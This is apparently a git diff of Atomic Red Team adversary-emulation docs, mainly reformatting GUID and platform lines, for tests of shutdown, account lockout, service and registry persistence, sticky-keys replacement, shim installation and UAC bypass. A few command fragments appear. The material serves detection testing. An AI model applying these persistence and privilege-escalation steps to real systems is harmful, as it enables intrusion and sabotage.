## Atomic Test #8 - Shutdown System via `poweroff` - Linux - -auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa - This test shuts down a Linux system using `poweroff`. + **Supported Platforms:** Linux +**auto_generated_guid:** 73a90cd2-48a2-4ac5-8594-2af35fa909fa + + + @@ -256,13 +272,15 @@ poweroff
## Atomic Test #9 - Reboot System via `poweroff` - Linux - -auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 - This test restarts a Linux system using `poweroff`. + **Supported Platforms:** Linux +**auto_generated_guid:** 61303105-ff60-427b-999e-efb90b314e41 + + + diff --git a/atomics/T1531/T1531.md b/atomics/T1531/T1531.md index a5dba7da..0e5483e1 100644 --- a/atomics/T1531/T1531.md +++ b/atomics/T1531/T1531.md @@ -16,14 +16,16 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
## Atomic Test #1 - Change User Password - Windows - -auto_generated_guid: 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 - Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with the password "HuHuHUHoHo283283". + **Supported Platforms:** Windows +**auto_generated_guid:** 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 + + + #### Inputs: @@ -55,13 +57,15 @@ net.exe user #{user_account} /delete >nul 2>&1
## Atomic Test #2 - Delete User - Windows - -auto_generated_guid: f21a1d7d-a62f-442a-8c3a-2440d43b19e5 - Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** f21a1d7d-a62f-442a-8c3a-2440d43b19e5 + + + #### Inputs: @@ -88,13 +92,15 @@ net.exe user #{user_account} /delete
## Atomic Test #3 - Remove Account From Domain Admin Group - -auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 - This test will remove an account from the domain admins group + **Supported Platforms:** Windows +**auto_generated_guid:** 43f71395-6c37-498e-ab17-897d814a0947 + + + #### Inputs: diff --git a/atomics/T1543.001/T1543.001.md b/atomics/T1543.001/T1543.001.md index 33f7a5b3..5f572f48 100644 --- a/atomics/T1543.001/T1543.001.md +++ b/atomics/T1543.001/T1543.001.md @@ -12,13 +12,15 @@ Adversaries may install a new launch agent that can be configured to execute at
## Atomic Test #1 - Launch Agent - -auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 - Create a plist and execute it + **Supported Platforms:** macOS +**auto_generated_guid:** a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + + + #### Inputs: diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index cbb857ac..7e10bdf0 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -22,13 +22,15 @@ While adversaries typically require root privileges to create/modify service uni
## Atomic Test #1 - Create Systemd Service - -auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c - This test creates a Systemd service unit file and enables it as a service. + **Supported Platforms:** Linux +**auto_generated_guid:** d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + + + #### Inputs: @@ -83,13 +85,15 @@ systemctl daemon-reload
## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. - -auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 - This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + **Supported Platforms:** Linux +**auto_generated_guid:** c35ac4a8-19de-43af-b9f8-755da7e89c89 + + + diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md index 616ccbd2..7044982f 100644 --- a/atomics/T1543.003/T1543.003.md +++ b/atomics/T1543.003/T1543.003.md @@ -20,15 +20,17 @@ Services may be created with administrator privileges but are executed under SYS
## Atomic Test #1 - Modify Fax service to run PowerShell - -auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f - This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. + **Supported Platforms:** Windows +**auto_generated_guid:** ed366cde-7d12-49df-a833-671904770b9f + + + @@ -53,14 +55,16 @@ sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
## Atomic Test #2 - Service Installation CMD - -auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 - Download an executable from github and start it as a service. Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 981e2942-e433-44e9-afc1-8c957a1496b6 + + + #### Inputs: @@ -105,14 +109,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Service Installation PowerShell - -auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 - Installs A Local Service via PowerShell. Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + + + #### Inputs: diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md index c8f5977d..d3aaeda3 100644 --- a/atomics/T1543.004/T1543.004.md +++ b/atomics/T1543.004/T1543.004.md @@ -14,13 +14,15 @@ The plist file permissions must be root:wheel, but the script or program that it
## Atomic Test #1 - Launch Daemon - -auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf - Utilize LaunchDaemon to launch `Hello World` + **Supported Platforms:** macOS +**auto_generated_guid:** 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + + + #### Inputs: diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md index 41cc789d..afb4141e 100644 --- a/atomics/T1546.001/T1546.001.md +++ b/atomics/T1546.001/T1546.001.md @@ -17,15 +17,17 @@ The values of the keys listed are commands that are executed when the handler op
## Atomic Test #1 - Change Default File Association - -auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 - Change Default File Association From cmd.exe of hta to notepad. Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 10a08978-2045-4d62-8c42-1957bbbea102 + + + #### Inputs: diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md index 6b340f80..4e2640aa 100644 --- a/atomics/T1546.002/T1546.002.md +++ b/atomics/T1546.002/T1546.002.md @@ -19,13 +19,15 @@ Adversaries can use screensaver settings to maintain persistence by setting the
## Atomic Test #1 - Set Arbitrary Binary as Screensaver - -auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 - This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. + **Supported Platforms:** Windows +**auto_generated_guid:** 281201e7-de41-4dc9-b73d-f288938cbb64 + + + #### Inputs: diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md index f94ca7be..7bf968e5 100644 --- a/atomics/T1546.003/T1546.003.md +++ b/atomics/T1546.003/T1546.003.md @@ -14,9 +14,6 @@ WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe
## Atomic Test #1 - Persistence via WMI Event Subscription - -auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 - Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. @@ -25,9 +22,14 @@ Code references https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + **Supported Platforms:** Windows +**auto_generated_guid:** 3c64f177-28e2-49eb-a799-d767b24dd1e0 + + + diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index 29f7920d..4299c29d 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -16,13 +16,15 @@ For macOS, the functionality of this technique is similar but may leverage zsh,
## Atomic Test #1 - Add command to .bash_profile - -auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f - Adds a command to the .bash_profile file of the current user + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 94500ae1-7e31-47e3-886b-c328da46872f + + + #### Inputs: @@ -47,13 +49,15 @@ echo "#{command_to_add}" >> ~/.bash_profile
## Atomic Test #2 - Add command to .bashrc - -auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f - Adds a command to the .bashrc file of the current user + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0a898315-4cfa-4007-bafe-33a4646d115f + + + #### Inputs: diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md index 7c2f996c..8520cfbd 100644 --- a/atomics/T1546.005/T1546.005.md +++ b/atomics/T1546.005/T1546.005.md @@ -12,14 +12,16 @@ Adversaries can use this to register code to be executed when the shell encounte
## Atomic Test #1 - Trap - -auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 - After exiting the shell, the script will download and execute. After sending a keyboard interrupt (CTRL+C) the script will download and execute. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** a74b2e07-5952-4c03-8b56-56274b076b61 + + + diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md index 374d1c09..04622979 100644 --- a/atomics/T1546.007/T1546.007.md +++ b/atomics/T1546.007/T1546.007.md @@ -12,13 +12,15 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
## Atomic Test #1 - Netsh Helper DLL Registration - -auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - Netsh interacts with other operating system components using dynamic-link library (DLL) files + **Supported Platforms:** Windows +**auto_generated_guid:** 3244697d-5a3a-4dfc-941c-550f69f91a4d + + + #### Inputs: diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md index 69ed5766..735d996a 100644 --- a/atomics/T1546.008/T1546.008.md +++ b/atomics/T1546.008/T1546.008.md @@ -26,15 +26,17 @@ Other accessibility features exist that may also be leveraged in a similar fashi
## Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes - -auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 + + + #### Inputs: @@ -84,13 +86,15 @@ Foreach ($item in $input_table)
## Atomic Test #2 - Replace binary of sticky keys - -auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - Replace sticky keys binary (sethc.exe) with cmd.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 934e90cf-29ca-48b3-863c-411737ad44e3 + + + diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index 4e7b5e57..75e6ea29 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -14,18 +14,20 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s
## Atomic Test #1 - Install AppInit Shim - -auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 - AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls + **Supported Platforms:** Windows +**auto_generated_guid:** a58d9386-3080-4242-ab5f-454c16503d18 + + + #### Inputs: diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md index 6b734da2..d24eac95 100644 --- a/atomics/T1546.011/T1546.011.md +++ b/atomics/T1546.011/T1546.011.md @@ -30,17 +30,19 @@ Utilizing these shims may allow an adversary to perform several malicious acts s
## Atomic Test #1 - Application Shim Installation - -auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 - Install a shim database. This technique is used for privilege escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run the AtomicTest.exe from the \\T1546.011\\bin directory. You should see a message box appear with "Atomic Shim DLL Test!" as defined in the AtomicTest.dll. To better understand what is happening, review the source code files is the \\T1546.011\\src directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + + + #### Inputs: @@ -93,15 +95,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - New shim database files created in the default shim database directory - -auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d - Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + **Supported Platforms:** Windows +**auto_generated_guid:** aefd6866-d753-431f-a7a4-215ca7e3f13d + + + @@ -127,16 +131,18 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -Err
## Atomic Test #3 - Registry key creation and/or modification events for SDB - -auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f - Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing the registry keys that were created. These keys can also be viewed using the Registry Editor. https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + **Supported Platforms:** Windows +**auto_generated_guid:** 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + + + diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index fb65e2d6..b9ab7202 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md @@ -22,13 +22,15 @@ Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniqu
## Atomic Test #1 - IFEO Add Debugger - -auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 - Leverage Global Flags Settings + **Supported Platforms:** Windows +**auto_generated_guid:** fdda2626-5234-4c90-b163-60849a24c0b8 + + + #### Inputs: @@ -58,13 +60,15 @@ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Imag
## Atomic Test #2 - IFEO Global Flags - -auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 - Leverage Global Flags Settings + **Supported Platforms:** Windows +**auto_generated_guid:** 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + + + #### Inputs: diff --git a/atomics/T1546.013/T1546.013.md b/atomics/T1546.013/T1546.013.md index f3f31982..dadf2820 100644 --- a/atomics/T1546.013/T1546.013.md +++ b/atomics/T1546.013/T1546.013.md @@ -16,13 +16,15 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
## Atomic Test #1 - Append malicious start-process cmdlet - -auto_generated_guid: 090e5aa5-32b6-473b-a49b-21e843a56896 - Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 090e5aa5-32b6-473b-a49b-21e843a56896 + + + #### Inputs: diff --git a/atomics/T1546.014/T1546.014.md b/atomics/T1546.014/T1546.014.md index 1c3eea1b..bb146717 100644 --- a/atomics/T1546.014/T1546.014.md +++ b/atomics/T1546.014/T1546.014.md @@ -14,13 +14,15 @@ Adversaries may abuse this service by writing a rule to execute commands when a
## Atomic Test #1 - Persistance with Event Monitor - emond - -auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 - Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 + **Supported Platforms:** macOS +**auto_generated_guid:** 23c9c127-322b-4c75-95ca-eff464906114 + + + #### Inputs: diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 7e20060b..8db87797 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -60,15 +60,17 @@ Adversaries can use these configuration locations to execute malware, such as re
## Atomic Test #1 - Reg Key Run - -auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 - Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** e55be3fd-3521-4610-9d1a-e210e42dcf05 + + + #### Inputs: @@ -97,15 +99,17 @@ REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red T
## Atomic Test #2 - Reg Key RunOnce - -auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb - RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 554cbd88-cde1-4b56-8168-0be552eed9eb + + + #### Inputs: @@ -134,14 +138,16 @@ REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
## Atomic Test #3 - PowerShell Registry RunOnce - -auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 - RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** eb44f842-0457-4ddc-9b92-c4caa144ac42 + + + #### Inputs: @@ -172,15 +178,17 @@ Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ig
## Atomic Test #4 - Suspicious vbs file run from startup Folder - -auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 - vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + + + @@ -208,16 +216,18 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Suspicious jse file run from startup Folder - -auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 - jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** dade9447-791e-4c8f-b04b-3a35855dfa06 + + + @@ -245,15 +255,17 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Suspicious bat file run from startup Folder - -auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e - bat files can be placed in and executed from the startup folder to maintain persistance. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. + **Supported Platforms:** Windows +**auto_generated_guid:** 5b6768e4-44d2-44f0-89da-a01d1430fd5e + + + @@ -281,13 +293,15 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batsta
## Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder - -auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d - Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. + **Supported Platforms:** Windows +**auto_generated_guid:** 24e55612-85f6-4bd6-ae74-a73d02e3441d + + + diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md index a360c823..da6f3b0d 100644 --- a/atomics/T1547.004/T1547.004.md +++ b/atomics/T1547.004/T1547.004.md @@ -22,15 +22,17 @@ Adversaries may take advantage of these features to repeatedly execute malicious
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell - -auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 - PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + + + #### Inputs: @@ -59,15 +61,17 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell - -auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb - PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + + + #### Inputs: @@ -96,15 +100,17 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell - -auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 - PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. + **Supported Platforms:** Windows +**auto_generated_guid:** d40da266-e073-4e5a-bb8b-2b385023e5f9 + + + #### Inputs: diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md index f067e1e4..92db61ec 100644 --- a/atomics/T1547.005/T1547.005.md +++ b/atomics/T1547.005/T1547.005.md @@ -12,13 +12,15 @@ The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentC
## Atomic Test #1 - Modify SSP configuration in registry - -auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e - Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. + **Supported Platforms:** Windows +**auto_generated_guid:** afdfd7e3-8a0b-409f-85f7-886fdf249c9e + + + #### Inputs: diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md index 94c10ffe..ca56ae7e 100644 --- a/atomics/T1547.006/T1547.006.md +++ b/atomics/T1547.006/T1547.006.md @@ -16,13 +16,15 @@ Adversaries can use LKMs and kexts to covertly persist on a system and elevate p
## Atomic Test #1 - Linux - Load Kernel Module via insmod - -auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 - This test uses the insmod command to load a kernel module for Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 687dcb93-9656-4853-9c36-9977315e9d23 + + + #### Inputs: diff --git a/atomics/T1547.007/T1547.007.md b/atomics/T1547.007/T1547.007.md index ef96fb9a..bbda29b0 100644 --- a/atomics/T1547.007/T1547.007.md +++ b/atomics/T1547.007/T1547.007.md @@ -14,15 +14,17 @@ An adversary can modify one of these files directly to include a link to their m
## Atomic Test #1 - Re-Opened Applications - -auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba - Plist Method [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 5fefd767-ef54-4ac6-84d3-751ab85e8aba + + + #### Run it with these steps! @@ -44,15 +46,17 @@ or
## Atomic Test #2 - Re-Opened Applications - -auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb - Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) + **Supported Platforms:** macOS +**auto_generated_guid:** 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + + + #### Inputs: diff --git a/atomics/T1547.009/T1547.009.md b/atomics/T1547.009/T1547.009.md index c36f9fe2..3e405cac 100644 --- a/atomics/T1547.009/T1547.009.md +++ b/atomics/T1547.009/T1547.009.md @@ -14,15 +14,17 @@ Adversaries could use shortcuts to execute their tools for persistence. They may
## Atomic Test #1 - Shortcut Modification - -auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce - This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** ce4fc678-364f-4282-af16-2fb4c78005ce + + + #### Inputs: @@ -53,14 +55,16 @@ del -f #{shortcut_file_path} >nul 2>&1
## Atomic Test #2 - Create shortcut to cmd in startup folders - -auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 - LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" to view the new shortcut. + **Supported Platforms:** Windows +**auto_generated_guid:** cfdc954d-4bb0-4027-875b-a1893ce406f2 + + + diff --git a/atomics/T1547.010/T1547.010.md b/atomics/T1547.010/T1547.010.md index db194c9d..4af13b5c 100644 --- a/atomics/T1547.010/T1547.010.md +++ b/atomics/T1547.010/T1547.010.md @@ -19,13 +19,15 @@ Adversaries can use this technique to load malicious code at startup that will p
## Atomic Test #1 - Add Port Monitor persistence in Registry - -auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + **Supported Platforms:** Windows +**auto_generated_guid:** d34ef297-f178-4462-871e-9ce618d44e50 + + + #### Inputs: diff --git a/atomics/T1547.011/T1547.011.md b/atomics/T1547.011/T1547.011.md index 1056a105..f39ea804 100644 --- a/atomics/T1547.011/T1547.011.md +++ b/atomics/T1547.011/T1547.011.md @@ -14,13 +14,15 @@ A specific plist used for execution at login is com.apple.loginitems.plist
## Atomic Test #1 - Plist Modification - -auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 - Modify MacOS plist file in one of two directories + **Supported Platforms:** macOS +**auto_generated_guid:** 394a538e-09bb-4a4a-95d1-b93cf12682a8 + + + #### Run it with these steps! diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md index 79887ecd..7286cc60 100644 --- a/atomics/T1548.001/T1548.001.md +++ b/atomics/T1548.001/T1548.001.md @@ -18,13 +18,15 @@ Adversaries can use this mechanism on their own malware to make sure they're abl
## Atomic Test #1 - Make and modify binary from C source - -auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 - Make, change owner, and change file attributes on a C source code file + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 896dfe97-ae43-4101-8e96-9a7996555d80 + + + #### Inputs: @@ -59,13 +61,15 @@ sudo rm /tmp/hello.c
## Atomic Test #2 - Set a SetUID flag on file - -auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 - This test sets the SetUID flag on a file in Linux and macOS. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 759055b3-3885-4582-a8ec-c00c9d64dd79 + + + #### Inputs: @@ -96,13 +100,15 @@ sudo rm #{file_to_setuid}
## Atomic Test #3 - Set a SetGID flag on file - -auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c - This test sets the SetGID flag on a file in Linux and macOS. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** db55f666-7cba-46c6-9fe6-205a05c3242c + + + #### Inputs: diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 1d8250bc..81999488 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -34,14 +34,16 @@ Another bypass is possible through some lateral movement techniques if credentia
## Atomic Test #1 - Bypass UAC using Event Viewer (cmd) - -auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 - Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages + **Supported Platforms:** Windows +**auto_generated_guid:** 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 + + + #### Inputs: @@ -71,14 +73,16 @@ reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell) - -auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b - PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages + **Supported Platforms:** Windows +**auto_generated_guid:** a6ce9acf-842a-4af6-8f79-539be7608e2b + + + #### Inputs: @@ -109,14 +113,16 @@ Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
